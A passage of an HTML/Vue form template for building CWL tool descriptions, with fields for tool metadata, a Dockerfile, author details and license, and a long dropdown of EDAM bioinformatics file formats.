class=\"form-control\" v-on:change=\"onUploadFile\" />\n </div>\n\n <hr style=\"border: 1px solid black;border-radius: 1px;\" />\n\n <p>This section enables you to create a CWL tool description. Please fill in the information as requested below. Required field = <font color=\"red\">*</font>.</p>\n\n <div class=\"panel panel-default\" ref=\"inputPanel\">\n <h4 class=\"card-title\">Specify basics<sup><font color=\"red\">*</font></sup>:</h4>\n\n <div class=\"form-group\">\n <label for=\"tool_id\">Tool identifier:</label>\n <input v-model=\"tool_id\" id=\"tool_id\" type=\"text\" placeholder=\"Please enter a unique identifier.\" class=\"form-control\" aria-describedby=\"helpBlock\" />\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n This identifier must contain only letters, numbers, and underscores. This identifier will be used within the name of the CWL document that is generated. <a v-on:click=\"var example = 'deseq2'; if (tool_id == example) { tool_id = example_cache['tool_id']; } else { example_cache['tool_id'] = tool_id; tool_id = example; }\">Show/hide example</a>.\n </div>\n </div>\n\n <div class=\"form-group\">\n <label for=\"tool_label\">Label:</label>\n <input v-model=\"tool_label\" id=\"tool_label\" type=\"text\" placeholder=\"Please enter a short description of the tool.\" class=\"form-control\" aria-describedby=\"helpBlock\" />\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n This description will inform tool users about its purpose and function. <a v-on:click=\"var example = 'DESeq2 example'; if (tool_label == example) { tool_label = example_cache['tool_label']; } else { example_cache['tool_label'] = tool_label; tool_label = example; }\">Show/hide example</a>.\n </div>\n </div>\n\n <div class=\"form-group\">\n <label for=\"doc\">Description:</label>\n <textarea v-model=\"doc\" id=\"doc\" rows=5 cols=100 placeholder=\"You may enter a longer description of the tool.\" class=\"form-control\" aria-describedby=\"helpBlock\"></textarea>\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n This optional description can provide more detailed documentation about the tool. <a v-on:click=\"var example = 'This tool demonstrates how to perform a differential-expression analysis using the Bioconductor DESeq2 package. We use a container image that provides core Bioconductor components (release version 3.10) and use R code to install the DESeq2 packages as well as two helper packages.'; if (doc == example) { doc = example_cache['doc']; } else { example_cache['doc'] = doc; doc = example; }\">Show/hide example</a>.\n </div>\n </div>\n\n <div class=\"form-group\">\n <label for=\"dockerfile\">Dockerfile:</label>\n <textarea v-model=\"dockerfile\" id=\"dockerfile\" rows=5 cols=100 placeholder=\"Please enter the contents of a Dockerfile.\" class=\"form-control\" style=\"font-family:monospace;\" aria-describedby=\"helpBlock\"></textarea>\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n A <a href=\"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/\">Dockerfile</a> provides instructions for building a Docker image, which can be used as the operating-system environment for the tool. <a href=\"https://osf.io/fsd7t/\" target=\"_blank\">This article</a> describes what Dockerfiles are and how to create them. <a v-on:click=\"var example = 'FROM bioconductor/bioconductor_docker:RELEASE_3_11\\nRUN R -e \\'BiocManager::install(c("DESeq2"))\\'\\nRUN R -e "install.packages(c(\\'dplyr\\', \\'readr\\'), repos=\\'https://cloud.r-project.org\\')"'; if (dockerfile == example) { dockerfile = example_cache['dockerfile']; } else { example_cache['dockerfile'] = dockerfile; dockerfile = example; }\">Show/hide example</a>.\n </div>\n </div>\n\n <div class=\"form-group\">\n <label for=\"author_name\">Author's name:</label>\n <input v-model=\"author_name\" id=\"author_name\" type=\"text\" placeholder=\"Please enter the author's name.\" class=\"form-control\" aria-describedby=\"helpBlock\" />\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n This is optional. Specifying the author's name is helpful to others who may use the tool.\n </div>\n </div>\n\n <div class=\"form-group\">\n <label for=\"author_orcid\">Author's ORCID identifier:</label>\n <input v-model=\"author_orcid\" id=\"author_orcid\" type=\"text\" placeholder=\"Please enter the author's ORCID identifier.\" class=\"form-control\" aria-describedby=\"helpBlock\" />\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n This is optional. Specifying the author's <a href=\"https://orcid.org\" target=\"_blank\">ORCID identifier</a> enables others who may use the tool to obtain more information about the author. <a v-on:click=\"var example = 'https://orcid.org/0000-0003-2001-1234'; if (author_orcid == example) { author_orcid = example_cache['author_orcid']; } else { example_cache['author_orcid'] = author_orcid; author_orcid = example; }\">Show/hide example</a>.\n </div>\n </div>\n\n <div class=\"form-group\">\n <label for=\"tool_label\">License:</label>\n <select v-model=\"license\" id=\"license\" class=\"form-control\" class=\"form-control\" aria-describedby=\"helpBlock\">\n <option value=\"AFL-3.0\">Academic Free License v3.0</option>\n <option value=\"Apache-2.0\">Apache License 2.0</option>\n <option value=\"BSD-3-Clause\">BSD 3-Clause \"New\" or \"Revised\" License</option>\n <option value=\"CC0-1.0\">Creative Commons Zero v1.0 Universal</option>\n <option value=\"CDDL-1.1\">Common Development and Distribution License 1.1</option>\n <option value=\"LGPL-3.0-or-later\">GNU Lesser General Public License v3.0 or later</option>\n <option value=\"MIT\">MIT License</option>\n </select>\n <div id=\"helpBlock\" class=\"form-text text-muted\">\n Please select a software license that applies to this CWL document. This will indicate conditions under which others can use the document. Details about these licenses and a more complete list can be found <a href=\"https://spdx.org/licenses/\" target=\"_blank\">here</a>. \n </div>\n </div>\n\n <p v-if=\"basics_errors.length\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in basics_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n </div>\n\n <div class=\"panel panel-default\" ref=\"inputPanel\">\n <h4 class=\"card-title\">Manage inputs<sup><font color=\"red\">*</font></sup>:</h4>\n\n <p>In this section, you can manage inputs. These are arguments that will be passed to the command-line tool. You must specify at least one regular input (string, int, or File)<!--(string, int, File, or Directory)-->. Technically, an \"Output File\" is not an input. However, when creating a CWL tool description, you can specify an <em>input</em> that is the name of an output file that the tool will create; then you must specify a corresponding <em>output</em> so the file will be collected after the tool executes. To make that simpler, we provide an \"Output File\" option that takes care of both of these steps. <a v-on:click=\"var example_name = 'read_counts_url'; var example_doc = 'The URL of a tab-separated-value file containing RNA-Sequencing read counts (unnormalized). Rows should represent genes. Columns should represent biological samples. The header line should contain sample identifiers. The first column should contain gene identifiers.'; if (newInputName == example_name && newInputDoc == example_doc) { newInputName = example_cache['newInputName']; newInputDoc = example_cache['newInputDoc'] } else { example_cache['newInputName'] = newInputName; example_cache['newInputDoc'] = newInputDoc; newInputName = example_name; newInputDoc = example_doc; }\">Show/hide example</a>.</p>\n\n <form v-on:submit.prevent=\"addInput\">\n <div class=\"form-group\">\n <label for=\"inputName\">Name:</label>\n <input v-model=\"newInputName\" id=\"inputName\" ref=\"newInputName\" type=\"text\" class=\"form-control\" placeholder=\"Only letters, numbers, and underscores are allowed.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"inputType\">Type:</label>\n <select v-model=\"newInputType\" id=\"inputType\" class=\"form-control\" id=\"inputType\">\n <option value=\"string\">string</option>\n <option value=\"int\">int</option>\n <option value=\"File\">File</option>\n <!--<option value=\"Directory\">Directory</option>-->\n <option value=\"Output_File\">Output File</option>\n </select>\n </div>\n\n <div class=\"form-group\">\n <label for=\"inputDoc\">Documentation:</label>\n <input v-model=\"newInputDoc\" id=\"inputDoc\" ref=\"newInputDoc\" type=\"text\" class=\"form-control\" placeholder=\"Provide a short description of this input.\" />\n </div>\n\n <div class=\"form-group\" v-if=\"newInputType=='File' || newInputType=='Output_File'\">\n <label for=\"inputFileFormat\">File format:</label>\n <select v-model=\"newInputFileFormat\" id=\"inputFileFormat\" class=\"form-control\" id=\"inputFileFormat\">\n <option value=\"\"></option>\n <option value=\"edam:format_1964\">plain text format (unformatted) - Plain text sequence format (essentially unformatted).</option>\n <option value=\"edam:format_3010\">.nib - .nib (nibble) binary format of a nucleotide sequence using 4 bits per...</option>\n <option value=\"edam:format_3009\">2bit - 2bit binary format of nucleotide sequences using 2 bits per nucleotide. In...</option>\n <option value=\"edam:format_2064\">3D-1D scoring matrix format - Format of a matrix of 3D-1D scores (amino acid environment probabilities).</option>\n <option value=\"edam:format_3281\">A2M - The A2M format is used as the primary format for multiple alignments of...</option>\n <option value=\"edam:format_1504\">aaindex - Amino acid index format used by the AAindex database.</option>\n <option value=\"edam:format_3000\">AB1 - AB1 binary format of raw DNA sequence reads (output of Applied Biosystems'...</option>\n <option value=\"edam:format_3708\">ABCD format - Exchange format of the Access to Biological Collections Data (ABCD) Schema;...</option>\n <option value=\"edam:format_1628\">ABI - A format of raw sequence read data from an Applied Biosystems sequencing...</option>\n <option value=\"edam:format_3001\">ACE - ACE sequence assembly format including contigs, base-call qualities, and...</option>\n <option value=\"edam:format_1923\">acedb - ACEDB sequence format.</option>\n <option value=\"edam:format_1639\">affymetrix - Format of affymetrix gene cluster files (hc-genes.txt, hc-chips.txt) from...</option>\n <option value=\"edam:format_1641\">affymetrix-exp - Affymetrix data file format for information about experimental conditions...</option>\n <option value=\"edam:format_3582\">afg - AFG is a single text-based file assembly format that holds read and...</option>\n <option value=\"edam:format_3693\">AGP - AGP is a tabular format for a sequence assembly (a contig, a...</option>\n <option value=\"edam:format_1921\">Alignment format - Data format for molecular sequence alignment information.</option>\n <option value=\"edam:format_2920\">Alignment format (pair only) - Data format for molecular sequence alignment information that can hold...</option>\n <option value=\"edam:format_2554\">Alignment format (text) - Text format for molecular sequence alignment information.</option>\n <option value=\"edam:format_2555\">Alignment format (XML) - XML format for molecular sequence alignment information.</option>\n <option value=\"edam:format_3888\">AMBER frcmod - AMBER frcmod (Force field Modification) is a file format to store any...</option>\n <option value=\"edam:format_3889\">AMBER off - AMBER Object File Format library files (OFF library files) store residue...</option>\n <option value=\"edam:format_3881\">AMBER top - AMBER Prmtop file (version 7) is a structure topology text file divided in...</option>\n <option value=\"edam:format_2097\">ambiguous - Alphabet for a molecular sequence with possible unknown positions and...</option>\n <option value=\"edam:format_2017\">Amino acid index format - Data format for an amino acid index.</option>\n <option value=\"edam:format_3780\">Annotated text format - Data format of an annotated text, e.g. with recognised entities, concepts,...</option>\n <option value=\"edam:format_3830\">ARB - Binary format used by the ARB software suite</option>\n <option value=\"edam:format_3581\">arff - ARFF (Attribute-Relation File Format) is an ASCII text file format that...</option>\n <option value=\"edam:format_2020\">Article format - Data format for a full-text scientific article.</option>\n <option value=\"edam:format_1966\">ASN.1 sequence format - NCBI ASN.1-based sequence format.</option>\n <option value=\"edam:format_3013\">axt - axt format of alignments, typically produced from BLASTZ.</option>\n <option value=\"edam:format_3327\">BAI - BAM indexing format</option>\n <option value=\"edam:format_2572\">BAM - BAM format, the binary, BGZF-formatted compressed version of SAM format for...</option>\n <option value=\"edam:format_3020\">BCF - BCF, the binary version of Variant Call Format (VCF) for sequence variation...</option>\n <option value=\"edam:format_3689\">BCML - Biological Connection Markup Language (BCML) is an XML format for biological...</option>\n <option value=\"edam:format_3690\">BDML - Biological Dynamics Markup Language (BDML) is an XML format for quantitative...</option>\n <option value=\"edam:format_3843\">BEAST - XML input file format for BEAST Software (Bayesian Evolutionary Analysis...</option>\n <option value=\"edam:format_3003\">BED - Browser Extensible Data (BED) format of sequence annotation track, typically...</option>\n <option value=\"edam:format_3586\">bed12 - A BED file where each feature is described by all twelve columns.</option>\n <option value=\"edam:format_3585\">bed6 - BED file format where each feature is described by chromosome, start, end,...</option>\n <option value=\"edam:format_3583\">bedgraph - The bedGraph format allows display of continuous-valued data in track...</option>\n <option value=\"edam:format_3584\">bedstrict - Browser Extensible Data (BED) format of sequence annotation track that...</option>\n <option value=\"edam:format_3691\">BEL - Biological Expression Language (BEL) is a textual format for representing...</option>\n <option value=\"edam:format_3615\">bgzip - Blocked GNU Zip format.</option>\n <option value=\"edam:format_2848\">Bibliographic reference format - Format of a bibliographic reference.</option>\n <option value=\"edam:format_3004\">bigBed - bigBed format for large sequence annotation tracks, similar to textual BED...</option>\n <option value=\"edam:format_3006\">bigWig - bigWig format for large sequence annotation tracks that consist of a value...</option>\n <option value=\"edam:format_2333\">Binary format - Binary format.</option>\n <option value=\"edam:format_3885\">BinPos - Scripps Research Institute BinPos format is a binary formatted file to store...</option>\n <option value=\"edam:format_3782\">BioC - BioC is a standardised XML format for sharing and integrating text data and...</option>\n <option value=\"edam:format_3706\">Biodiversity data format - Data format for biodiversity data.</option>\n <option value=\"edam:format_3772\">BioJSON (BioXSD) - BioJSON is a BioXSD-schema-based JSON format of sequence-based data and some...</option>\n <option value=\"edam:format_3774\">BioJSON (Jalview) - BioJSON is a JSON format of single multiple sequence alignments, with their...</option>\n <option value=\"edam:format_2013\">Biological pathway or network format - Data format for a biological pathway or network.</option>\n <option value=\"edam:format_3166\">Biological pathway or network report format - Data format for a report of information derived from a biological pathway or...</option>\n <option value=\"edam:format_3746\">BIOM format - The BIological Observation Matrix (BIOM) is a format for representing...</option>\n <option value=\"edam:format_3785\">BioNLP Shared Task format - A family of similar formats of text annotation, used by BRAT and other...</option>\n <option value=\"edam:format_3156\">BioPAX - BioPAX is an exchange format for pathway data, with its data model defined...</option>\n <option value=\"edam:format_2352\">BioXSD (XML) - BioXSD-schema-based XML format of sequence-based data and some other common...</option>\n <option value=\"edam:format_3773\">BioYAML - BioYAML is a BioXSD-schema-based YAML format of sequence-based data and some...</option>\n <option value=\"edam:format_1333\">BLAST results - Format of results of a sequence database search using some variant of BLAST.</option>\n <option value=\"edam:format_3331\">BLAST XML results format - XML format as produced by the NCBI Blast package</option>\n <option value=\"edam:format_3836\">BLAST XML v2 results format - XML format as produced by the NCBI Blast package v2.</option>\n <option value=\"edam:format_3313\">BLC - A multiple alignment in vertical format, as used in the AMPS (Alignment of...</option>\n <option value=\"edam:format_3592\">BMP - Standard bitmap storage format in the Microsoft Windows environment.</option>\n <option value=\"edam:format_3909\">BpForms - BpForms is a string format for concretely representing the primary...</option>\n <option value=\"edam:format_3487\">BSML - Bioinformatics Sequence Markup Language format.</option>\n <option value=\"edam:format_3776\">BTrack - BTrack is an HDF5-based binary format for genome or sequence feature tracks...</option>\n <option value=\"edam:format_1630\">CAF - Common Assembly Format (CAF). A sequence assembly format including contigs,...</option>\n <option value=\"edam:format_3100\">CATH domain report format - Format of summary of domain classification information for a CATH domain.</option>\n <option value=\"edam:format_2184\">cdsxml - XML format for EMBL entries.</option>\n <option value=\"edam:format_1638\">cel - Format of Affymetrix data file of information about (raw) expression levels...</option>\n <option value=\"edam:format_3240\">CellML - CellML, the format for mathematical models of biological and other networks.</option>\n <option value=\"edam:format_3844\">Chado-XML - Chado-XML format is a direct mapping of the Chado relational schema into XML.</option>\n <option value=\"edam:format_3887\">CHARMM rtf - Format of CHARMM Residue Topology Files (RTF), which define groups by...</option>\n <option value=\"edam:format_2030\">Chemical data format - Format of a report on a chemical compound.</option>\n <option value=\"edam:format_2035\">Chemical formula format - Text format of a chemical formula.</option>\n <option value=\"edam:format_1644\">CHP - Format of Affymetrix data file of information about (normalised) expression...</option>\n <option value=\"edam:format_3587\">chrominfo - Tabular format of chromosome names and sizes used by Galaxy.</option>\n <option value=\"edam:format_1737\">CiteXplore-all - CiteXplore 'all' citation format includes all known details such as Mesh...</option>\n <option value=\"edam:format_1736\">CiteXplore-core - CiteXplore 'core' citation format including title, journal, authors and...</option>\n <option value=\"edam:format_1424\">ClustalW dendrogram - Dendrogram (tree file) format generated by ClustalW.</option>\n <option value=\"edam:format_1982\">ClustalW format - ClustalW format for (aligned) sequences.</option>\n <option value=\"edam:format_1925\">codata - Codata entry format.</option>\n <option value=\"edam:format_3686\">COMBINE OMEX - Open Modeling EXchange format (OMEX) is a ZIPped format for encapsulating...</option>\n <option value=\"edam:format_2566\">completely unambiguous - Alphabet for a molecular sequence without any unknown positions or ambiguity...</option>\n <option value=\"edam:format_2567\">completely unambiguous pure - Alphabet for a molecular sequence without unknown positions, ambiguity or...</option>\n <option value=\"edam:format_2569\">completely unambiguous pure dna - Alphabet for a DNA sequence (characters ACGT only) without unknown...</option>\n <option value=\"edam:format_2568\">completely unambiguous pure nucleotide - Alphabet for a nucleotide sequence (characters ACGTU only) without unknown...</option>\n <option value=\"edam:format_2607\">completely unambiguous pure protein - Alphabet for any protein sequence without unknown positions, ambiguity or...</option>\n <option value=\"edam:format_2570\">completely unambiguous pure rna sequence - Alphabet for an RNA sequence (characters ACGU only) without unknown...</option>\n <option value=\"edam:format_1209\">consensus - Alphabet for the consensus of two or more molecular sequences.</option>\n <option value=\"edam:format_3832\">consensusXML - OpenMS format for grouping features in one map or across several maps.</option>\n <option value=\"edam:format_3239\">CopasiML - CopasiML, the native format of COPASI.</option>\n <option value=\"edam:format_3462\">CRAM - Reference-based compression of alignment format</option>\n <option value=\"edam:format_3589\">csfasta - Color space FASTA format sequence variant.</option>\n <option value=\"edam:format_3752\">CSV - Tabular data represented as comma-separated values in a text file.</option>\n <option value=\"edam:format_3309\">CT - File format of a CT (Connectivity Table) file from the RNAstructure package.</option>\n <option value=\"edam:format_3588\">customtrack - Custom Sequence annotation track format used by Galaxy.</option>\n <option value=\"edam:format_3857\">CWL - Common Workflow Language (CWL) format for description of command-line tools...</option>\n <option value=\"edam:format_3235\">Cytoband format - Cytoband format for chromosome cytobands.</option>\n <option value=\"edam:format_3477\">Cytoscape input file format - Format of the cytoscape input file of gene expression ratios or values are...</option>\n <option value=\"edam:format_1393\">daf - EMBASSY 'domain alignment file' (DAF) format, containing a sequence...</option>\n <option value=\"edam:format_1967\">DAS format - DAS sequence (XML) format (any type).</option>\n <option value=\"edam:format_1968\">dasdna - DAS sequence (XML) format (nucleotide-only).</option>\n <option value=\"edam:format_1978\">DASGFF - DAS GFF (XML) feature format.</option>\n <option value=\"edam:format_1637\">dat - Format of Affymetrix data file of raw image data.</option>\n <option value=\"edam:format_3326\">Data index format - Format of a data index of some type.</option>\n <option value=\"edam:format_2066\">Database hits (sequence) format - Format of a report on sequence hits and associated data from searching a...</option>\n <option value=\"edam:format_3729\">dbGaP format - Input format used by the Database of Genotypes and Phenotypes (dbGaP).</option>\n <option value=\"edam:format_1926\">dbid - Fasta format variant with database name before ID.</option>\n <option value=\"edam:format_1983\">debug - EMBOSS alignment format for debugging trace of full internal data content.</option>\n <option value=\"edam:format_1979\">debug-feat - EMBOSS debugging trace feature format of full internal data content.</option>\n <option value=\"edam:format_1969\">debug-seq - EMBOSS debugging trace sequence format of full internal data content.</option>\n <option value=\"edam:format_1336\">dhf - Format of EMBASSY domain hits file (DHF) of hits (sequences) with domain...</option>\n <option value=\"edam:format_1392\">DIALIGN format - Format of multiple sequences aligned by DIALIGN package.</option>\n <option value=\"edam:format_3548\">DICOM format - Medical image format corresponding to the Digital Imaging and Communications...</option>\n <option value=\"edam:format_2074\">Dirichlet distribution format - Data format of a dirichlet distribution.</option>\n <option value=\"edam:format_1212\">dna - Alphabet for a DNA sequence with possible ambiguity, unknown positions and...</option>\n <option value=\"edam:format_3507\">Document format - Format of documents including word processor, spreadsheet and presentation.</option>\n <option value=\"edam:format_3506\">docx - Microsoft Word format.</option>\n <option value=\"edam:format_1457\">Dot-bracket format - Format of RNA secondary structure in dot-bracket notation, originally...</option>\n <option value=\"edam:format_1454\">dssp - Format of an entry from the DSSP database (Dictionary of Secondary Structure...</option>\n <option value=\"edam:format_3751\">DSV - Tabular data represented as values in a text file delimited by some...</option>\n <option value=\"edam:format_3652\">dta - Spectral data format file where each spectrum is written to a separate file.</option>\n <option value=\"edam:format_3157\">EBI Application Result XML - EBI Application Result XML is a format returned by sequence similarity...</option>\n <option value=\"edam:format_3484\">ebwt - Bowtie format for indexed reference genome for small genomes.</option>\n <option value=\"edam:format_3491\">ebwtl - Bowtie format for indexed reference genome for large genomes.</option>\n <option value=\"edam:format_3818\">ELAND format - Tab-delimited text file format used by Eland - the read-mapping program...</option>\n <option value=\"edam:format_1248\">EMBL feature location - Format for sequence positions (feature location) as used in...</option>\n <option value=\"edam:format_1927\">EMBL format - EMBL entry format.</option>\n <option value=\"edam:format_2204\">EMBL format (XML) - An XML format for EMBL entries.</option>\n <option value=\"edam:format_2311\">EMBL-HTML - EMBL entry format wrapped in HTML elements.</option>\n <option value=\"edam:format_2181\">EMBL-like (text) - A text format resembling EMBL entry format.</option>\n <option value=\"edam:format_2558\">EMBL-like (XML) - An XML format resembling EMBL entry format.</option>\n <option value=\"edam:format_2543\">EMBL-like format - A format resembling EMBL entry (plain text) format.</option>\n <option value=\"edam:format_2183\">EMBLXML - XML format for EMBL entries.</option>\n <option value=\"edam:format_1297\">EMBOSS repeat - Report format for tandem repeats in a sequence (an EMBOSS report format).</option>\n <option value=\"edam:format_1357\">EMBOSS sequence pattern - Format of an EMBOSS sequence pattern.</option>\n <option value=\"edam:format_2001\">EMBOSS simple format - EMBOSS simple multiple alignment format.</option>\n <option value=\"edam:format_3614\">ENCODE broad peak format - Human ENCODE broad peak format.</option>\n <option value=\"edam:format_3613\">ENCODE narrow peak format - Human ENCODE narrow peak format.</option>\n <option value=\"edam:format_3612\">ENCODE peak format - Human ENCODE peak format.</option>\n <option value=\"edam:format_3499\">Ensembl variation file format - Ensembl standard format for variation data.</option>\n <option value=\"edam:format_2027\">Enzyme kinetics report format - Data format for reports on enzyme kinetics.</option>\n <option value=\"edam:format_3466\">EPS - Encapsulated PostScript format</option>\n <option value=\"edam:format_1316\">est2genome format - Format of a report on exon-intron structure generated by EMBOSS est2genome.</option>\n <option value=\"edam:format_1631\">EXP - Sequence assembly project file EXP format.</option>\n <option value=\"edam:format_3167\">Experiment annotation format - Data format for annotation on a laboratory experiment.</option>\n <option value=\"edam:format_1929\">FASTA - FASTA format including NCBI-style IDs.</option>\n <option value=\"edam:format_1332\">FASTA search results format - Format of results of a sequence database search using FASTA.</option>\n <option value=\"edam:format_1984\">FASTA-aln - Fasta format for (aligned) sequences.</option>\n <option value=\"edam:format_2310\">FASTA-HTML - FASTA format wrapped in HTML elements.</option>\n <option value=\"edam:format_2546\">FASTA-like - A format resembling FASTA format.</option>\n <option value=\"edam:format_2200\">FASTA-like (text) - A text format resembling FASTA format.</option>\n <option value=\"edam:format_3823\">FASTG - FASTG is a format for faithfully representing genome assemblies in the face...</option>\n <option value=\"edam:format_1930\">FASTQ - FASTQ short read format ignoring quality scores.</option>\n <option value=\"edam:format_1931\">FASTQ-illumina - FASTQ Illumina 1.3 short read format.</option>\n <option value=\"edam:format_2545\">FASTQ-like format - A format resembling FASTQ short read format.</option>\n <option value=\"edam:format_2182\">FASTQ-like format (text) - A text format resembling FASTQ short read format.</option>\n <option value=\"edam:format_1932\">FASTQ-sanger - FASTQ short read format with phred quality.</option>\n <option value=\"edam:format_1933\">FASTQ-solexa - FASTQ Solexa/Illumina 1.0 short read format.</option>\n <option value=\"edam:format_3833\">featureXML - OpenMS format for quantitation results (LC/MS features).</option>\n <option value=\"edam:format_3884\">FF parameter format - Format of force field parameter files, which store the set of parameters...</option>\n <option value=\"edam:format_1582\">findkm - A report format for the kinetics of enzyme-catalysed reaction(s) in a format...</option>\n <option value=\"edam:format_1934\">fitch program - Fitch program format.</option>\n <option value=\"edam:format_1915\">Format - A defined way or layout of representing and structuring data in a computer...</option>\n <option value=\"edam:format_2350\">Format (by type of data) - A placeholder concept for visual navigation by dividing data formats by the...</option>\n <option value=\"edam:format_3163\">GCDML - GCDML XML format for genome and metagenome metadata according to...</option>\n <option value=\"edam:format_1935\">GCG - GCG sequence file format.</option>\n <option value=\"edam:format_3486\">GCG format variant - Some format based on the GCG format.</option>\n <option value=\"edam:format_1947\">GCG MSF - GCG MSF (multiple sequence file) file format.</option>\n <option value=\"edam:format_3709\">GCT/Res format - Tab-delimited text files of GenePattern that contain a column for each...</option>\n <option value=\"edam:format_3312\">GDE - Format for the Genetic Data Environment (GDE).</option>\n <option value=\"edam:format_3249\">GelML - GelML is the format for describing the process of gel electrophoresis,...</option>\n <option value=\"edam:format_3622\">Gemini SQLite format - Data format used by the SQLite database conformant to the Gemini schema.</option>\n <option value=\"edam:format_3812\">GEN - The GEN file format contains genetic data and describes SNPs.</option>\n <option value=\"edam:format_1936\">GenBank format - Genbank entry format.</option>\n <option value=\"edam:format_2532\">GenBank-HTML - Genbank entry format wrapped in HTML elements.</option>\n <option value=\"edam:format_2559\">GenBank-like format - A format resembling GenBank entry (plain text) format.</option>\n <option value=\"edam:format_2205\">GenBank-like format (text) - A text format resembling GenBank entry (plain text) format.</option>\n <option value=\"edam:format_2031\">Gene annotation format - Format of a report on a particular locus, gene, gene system or groups of...</option>\n <option value=\"edam:format_2058\">Gene expression report format - Format of a file of gene expression data, e.g. a gene expression matrix or...</option>\n <option value=\"edam:format_3011\">genePred - genePred table format for gene prediction tracks.</option>\n <option value=\"edam:format_2186\">geneseq - Geneseq sequence format.</option>\n <option value=\"edam:format_1937\">genpept - Genpept protein entry format.</option>\n <option value=\"edam:format_2305\">GFF - GFF feature format (of indeterminate version).</option>\n <option value=\"edam:format_1974\">GFF2 - General Feature Format (GFF) of sequence features.</option>\n <option value=\"edam:format_1938\">GFF2-seq - GFF feature file format with sequence in the header.</option>\n <option value=\"edam:format_1975\">GFF3 - Generic Feature Format version 3 (GFF3) of sequence features.</option>\n <option value=\"edam:format_1939\">GFF3-seq - GFF3 feature file format with sequence.</option>\n <option value=\"edam:format_3467\">GIF - Graphics Interchange Format.</option>\n <option value=\"edam:format_1940\">giFASTA format - FASTA sequence format including NCBI-style GIs.</option>\n <option value=\"edam:format_3822\">GML - GML (Graph Modeling Language) is a text file format supporting network data...</option>\n <option value=\"edam:format_3657\">GPML - Graphical Pathway Markup Language (GPML) is an XML format used for...</option>\n <option value=\"edam:format_3829\">GPR - GenePix Results (GPR) text file format developed by Axon Instruments that is...</option>\n <option value=\"edam:format_3617\">Graph format - Data format for graph data.</option>\n <option value=\"edam:format_3883\">GROMACS itp - GROMACS itp files (include topology) contain structure topology information,...</option>\n <option value=\"edam:format_3880\">GROMACS top - GROMACS MD package top textual files define an entire structure system...</option>\n <option value=\"edam:format_3775\">GSuite - GSuite is a tabular format for collections of genome or sequence feature...</option>\n <option value=\"edam:format_2306\">GTF - Gene Transfer Format (GTF), a restricted version of GFF.</option>\n <option value=\"edam:format_3164\">GTrack - GTrack is a generic and optimised tabular format for genome or sequence...</option>\n <option value=\"edam:format_3019\">GVF - Genome Variation Format (GVF). A GFF3-compatible format with defined header...</option>\n <option value=\"edam:format_3873\">HDF - HDF is the name of a set of file formats and libraries designed to store and...</option>\n <option value=\"edam:format_3590\">HDF5 - HDF5 is a data model, library, and file format for storing and managing...</option>\n <option value=\"edam:format_1941\">hennig86 - Hennig86 output sequence format.</option>\n <option value=\"edam:format_1705\">HET group dictionary entry format - The format of an entry from the HET group dictionary (HET groups from PDB...</option>\n <option value=\"edam:format_2072\">Hidden Markov model format - Format of a hidden Markov model.</option>\n <option value=\"edam:format_2075\">HMM emission and transition counts format - Data format for the emission and transition counts of a hidden Markov model.</option>\n <option value=\"edam:format_1349\">HMMER Dirichlet prior - Dirichlet distribution HMMER format.</option>\n <option value=\"edam:format_1351\">HMMER emission and transition - Format of a report from the HMMER package on the emission and transition...</option>\n <option value=\"edam:format_1370\">HMMER format - Format of a hidden Markov model representation used by the HMMER package.</option>\n <option value=\"edam:format_1422\">HMMER profile alignment (HMM versus sequences) - Format used by the HMMER package for of an alignment of a hidden Markov...</option>\n <option value=\"edam:format_1421\">HMMER profile alignment (sequences versus HMMs) - Format used by the HMMER package for an alignment of a sequence against a...</option>\n <option value=\"edam:format_1391\">HMMER-aln - FASTA-style format for multiple sequences aligned by HMMER package to an HMM.</option>\n <option value=\"edam:format_3328\">HMMER2 - HMMER profile HMM file for HMMER versions 2.x</option>\n <option value=\"edam:format_3329\">HMMER3 - HMMER profile HMM file for HMMER versions 3.x</option>\n <option value=\"edam:format_3845\">HSAML - An alignment format generated by PRANK/PRANKSTER consisting of four...</option>\n <option value=\"edam:format_1455\">hssp - Entry format of the HSSP database (Homology-derived Secondary Structure in...</option>\n <option value=\"edam:format_2331\">HTML - HTML format.</option>\n <option value=\"edam:format_3839\">ibd - ibd is a data format for mass spectrometry imaging data.</option>\n <option value=\"edam:format_3578\">IDAT - Proprietary file format for (raw) BeadArray data used by genomewide...</option>\n <option value=\"edam:format_3764\">idXML - XML file format for files containing information about peptide...</option>\n <option value=\"edam:format_1942\">ig - Intelligenetics sequence format.</option>\n <option value=\"edam:format_1943\">igstrict - Intelligenetics sequence format (strict version).</option>\n <option value=\"edam:format_1740\">iHOP format - The format of iHOP (Information Hyperlinked over Proteins) text-mining...</option>\n <option value=\"edam:format_3593\">im - IM is a format used by LabEye and other applications based on the IFUNC...</option>\n <option value=\"edam:format_3547\">Image format - Format used for images and image metadata.</option>\n <option value=\"edam:format_3682\">imzML metadata file - imzML metadata is a data format for mass spectrometry imaging metadata.</option>\n <option value=\"edam:format_1197\">InChI - Chemical structure specified in IUPAC International Chemical Identifier...</option>\n <option value=\"edam:format_1199\">InChIKey - The InChIKey (hashed InChI) is a fixed length (25 character) condensed...</option>\n <option value=\"edam:format_3287\">Individual genetic data format - Data format for a metadata on an individual and their genetic data.</option>\n <option value=\"edam:format_2185\">insdxml - XML format for EMBL entries.</option>\n <option value=\"edam:format_1341\">InterPro hits format - Results format for searches of the InterPro database.</option>\n <option value=\"edam:format_1343\">InterPro match table format - Format of results of a search of the InterPro database showing matches...</option>\n <option value=\"edam:format_1342\">InterPro protein view report format - Format of results of a search of the InterPro database showing matches of...</option>\n <option value=\"edam:format_3846\">InterProScan XML - Output xml file from the InterProScan sequence analysis application.</option>\n <option value=\"edam:format_3687\">ISA-TAB - The Investigation / Study / Assay (ISA) tab-delimited (TAB) format...</option>\n <option value=\"edam:format_1944\">jackknifer - Jackknifer interleaved and non-interleaved sequence format.</option>\n <option value=\"edam:format_1970\">jackknifernon - Jackknifer output sequence non-interleaved format.</option>\n <option value=\"edam:format_1367\">JASPAR format - A profile (sequence classifier) in the format used in the JASPAR database.</option>\n <option 